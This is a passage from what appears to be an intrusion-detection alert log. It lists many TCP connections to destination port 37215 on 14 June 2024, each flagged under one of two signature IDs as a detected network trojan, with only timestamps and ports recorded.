                Timestamp:06/14/24-10:44:06.470962
                SID:2829579
                Source Port:48342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471719
                SID:2829579
                Source Port:40044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669715
                SID:2835222
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410258
                SID:2829579
                Source Port:33184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382589
                SID:2829579
                Source Port:51326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932638
                SID:2829579
                Source Port:44478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182051
                SID:2835222
                Source Port:54278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408232
                SID:2829579
                Source Port:39496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663829
                SID:2829579
                Source Port:52978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545331
                SID:2835222
                Source Port:56744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944576
                SID:2829579
                Source Port:44946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987936
                SID:2829579
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616668
                SID:2829579
                Source Port:37202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086165
                SID:2829579
                Source Port:57584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725440
                SID:2835222
                Source Port:48740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728696
                SID:2835222
                Source Port:34720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505337
                SID:2835222
                Source Port:39206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563067
                SID:2829579
                Source Port:56858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134741
                SID:2829579
                Source Port:38364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678555
                SID:2835222
                Source Port:42368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942153
                SID:2829579
                Source Port:33672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135172
                SID:2829579
                Source Port:36626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917090
                SID:2835222
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792602
                SID:2835222
                Source Port:36832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243753
                SID:2829579
                Source Port:34392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544925
                SID:2829579
                Source Port:46470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678262
                SID:2829579
                Source Port:36534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662967
                SID:2835222
                Source Port:42584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165088
                SID:2829579
                Source Port:54004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027300
                SID:2829579
                Source Port:41924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977647
                SID:2829579
                Source Port:32858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944770
                SID:2829579
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243525
                SID:2829579
                Source Port:33728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230936
                SID:2829579
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811844
                SID:2835222
                Source Port:41176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991970
                SID:2835222
                Source Port:57208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615072
                SID:2835222
                Source Port:51852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729210
                SID:2829579
                Source Port:35034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082253
                SID:2829579
                Source Port:51634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944385
                SID:2835222
                Source Port:36752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685105
                SID:2829579
                Source Port:40354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734221
                SID:2829579
                Source Port:37992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793027
                SID:2835222
                Source Port:34334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341269
                SID:2835222
                Source Port:46660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859504
                SID:2829579
                Source Port:51938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012340
                SID:2829579
                Source Port:47264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967537
                SID:2829579
                Source Port:43532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849921
                SID:2829579
                Source Port:56390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182139
                SID:2835222
                Source Port:55426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184079
                SID:2829579
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718700
                SID:2835222
                Source Port:58548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811308
                SID:2835222
                Source Port:54180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992211
                SID:2829579
                Source Port:34702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016438
                SID:2835222
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016877
                SID:2835222
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725850
                SID:2829579
                Source Port:45836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718293
                SID:2829579
                Source Port:51832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831145
                SID:2835222
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966452
                SID:2835222
                Source Port:45902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614192
                SID:2829579
                Source Port:48700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624842
                SID:2829579
                Source Port:41766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111452
                SID:2835222
                Source Port:39334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013223
                SID:2829579
                Source Port:35812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152691
                SID:2829579
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034769
                SID:2829579
                Source Port:41090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848956
                SID:2829579
                Source Port:34258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277039
                SID:2829579
                Source Port:50950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941273
                SID:2829579
                Source Port:46848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618364
                SID:2829579
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276974
                SID:2835222
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323919
                SID:2829579
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862097
                SID:2835222
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662916
                SID:2835222
                Source Port:56970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182784
                SID:2829579
                Source Port:58792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969477
                SID:2835222
                Source Port:33910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323626
                SID:2829579
                Source Port:57956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381445
                SID:2829579
                Source Port:44574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942282
                SID:2829579
                Source Port:36952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568259
                SID:2829579
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053426
                SID:2829579
                Source Port:43998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183222
                SID:2835222
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177716
                SID:2829579
                Source Port:35908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050718
                SID:2829579
                Source Port:58128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024310
                SID:2835222
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858603
                SID:2835222
                Source Port:34808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293565
                SID:2835222
                Source Port:33512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453478
                SID:2829579
                Source Port:57346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762963
                SID:2835222
                Source Port:47152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676922
                SID:2829579
                Source Port:39586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025819
                SID:2829579
                Source Port:32916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013347
                SID:2835222
                Source Port:35314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968813
                SID:2829579
                Source Port:41022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789234
                SID:2835222
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012248
                SID:2829579
                Source Port:34002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087167
                SID:2835222
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988782
                SID:2829579
                Source Port:57532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072247
                SID:2835222
                Source Port:52070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700733
                SID:2829579
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862065
                SID:2829579
                Source Port:47848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014924
                SID:2835222
                Source Port:47580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030486
                SID:2829579
                Source Port:46920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074789
                SID:2835222
                Source Port:40802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979100
                SID:2829579
                Source Port:46990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663406
                SID:2835222
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910548
                SID:2829579
                Source Port:59648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019884
                SID:2835222
                Source Port:48508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661783
                SID:2829579
                Source Port:46730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081603
                SID:2829579
                Source Port:35142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733009
                SID:2829579
                Source Port:52168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761099
                SID:2829579
                Source Port:54208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018645
                SID:2835222
                Source Port:58576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407834
                SID:2829579
                Source Port:53866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932507
                SID:2835222
                Source Port:59212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789623
                SID:2835222
                Source Port:38922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150302
                SID:2829579
                Source Port:48380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181169
                SID:2835222
                Source Port:55668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880103
                SID:2829579
                Source Port:38162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055594
                SID:2835222
                Source Port:46248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671384
                SID:2835222
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776907
                SID:2829579
                Source Port:57276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517881
                SID:2835222
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151723
                SID:2835222
                Source Port:53852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845520
                SID:2835222
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683065
                SID:2835222
                Source Port:46584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762202
                SID:2829579
                Source Port:49812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704166
                SID:2835222
                Source Port:43198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733288
                SID:2835222
                Source Port:49398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968979
                SID:2829579
                Source Port:36976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250588
                SID:2829579
                Source Port:50844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847418
                SID:2835222
                Source Port:48948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244007
                SID:2835222
                Source Port:36926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520498
                SID:2829579
                Source Port:36606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737507
                SID:2835222
                Source Port:41440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775420
                SID:2835222
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760566
                SID:2829579
                Source Port:57568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916737
                SID:2829579
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675302
                SID:2829579
                Source Port:54622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246359
                SID:2829579
                Source Port:44152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846132
                SID:2835222
                Source Port:47232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717586
                SID:2829579
                Source Port:40622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661205
                SID:2829579
                Source Port:46264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849353
                SID:2829579
                Source Port:34848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943000
                SID:2835222
                Source Port:60256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274609
                SID:2835222
                Source Port:38198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226173
                SID:2835222
                Source Port:45562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250661
                SID:2829579
                Source Port:35580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010002
                SID:2835222
                Source Port:47092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071340
                SID:2835222
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791815
                SID:2829579
                Source Port:55866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704720
                SID:2835222
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275199
                SID:2835222
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684516
                SID:2829579
                Source Port:52756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011414
                SID:2835222
                Source Port:59324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725188
                SID:2835222
                Source Port:47316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111811
                SID:2829579
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682569
                SID:2829579
                Source Port:33784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276861
                SID:2829579
                Source Port:51412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970879
                SID:2835222
                Source Port:46096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828559
                SID:2835222
                Source Port:51732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979919
                SID:2829579
                Source Port:58832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084179
                SID:2835222
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849569
                SID:2829579
                Source Port:57976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115390
                SID:2829579
                Source Port:42978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988117
                SID:2835222
                Source Port:47920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472073
                SID:2829579
                Source Port:55204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861680
                SID:2835222
                Source Port:37612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970729
                SID:2829579
                Source Port:53704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452380
                SID:2835222
                Source Port:49918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972406
                SID:2835222
                Source Port:37864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997196
                SID:2829579
                Source Port:60440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365874
                SID:2829579
                Source Port:50030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367586
                SID:2829579
                Source Port:51686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183506
                SID:2829579
                Source Port:55892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705246
                SID:2835222
                Source Port:37232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073965
                SID:2835222
                Source Port:55456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384115
                SID:2835222
                Source Port:47598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663169
                SID:2835222
                Source Port:55344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450077
                SID:2829579
                Source Port:47412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881391
                SID:2829579
                Source Port:60168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763089
                SID:2835222
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504276
                SID:2829579
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017191
                SID:2829579
                Source Port:37278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880375
                SID:2829579
                Source Port:50960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790955
                SID:2829579
                Source Port:56050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023201
                SID:2835222
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277626
                SID:2835222
                Source Port:56708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365274
                SID:2835222
                Source Port:40498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991250
                SID:2835222
                Source Port:51100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179113
                SID:2829579
                Source Port:46896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131076
                SID:2829579
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934509
                SID:2835222
                Source Port:50272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421847
                SID:2835222
                Source Port:53552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292523
                SID:2829579
                Source Port:35552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546772
                SID:2829579
                Source Port:47430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688131
                SID:2829579
                Source Port:44296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182681
                SID:2829579
                Source Port:60478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727269
                SID:2835222
                Source Port:33086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727419
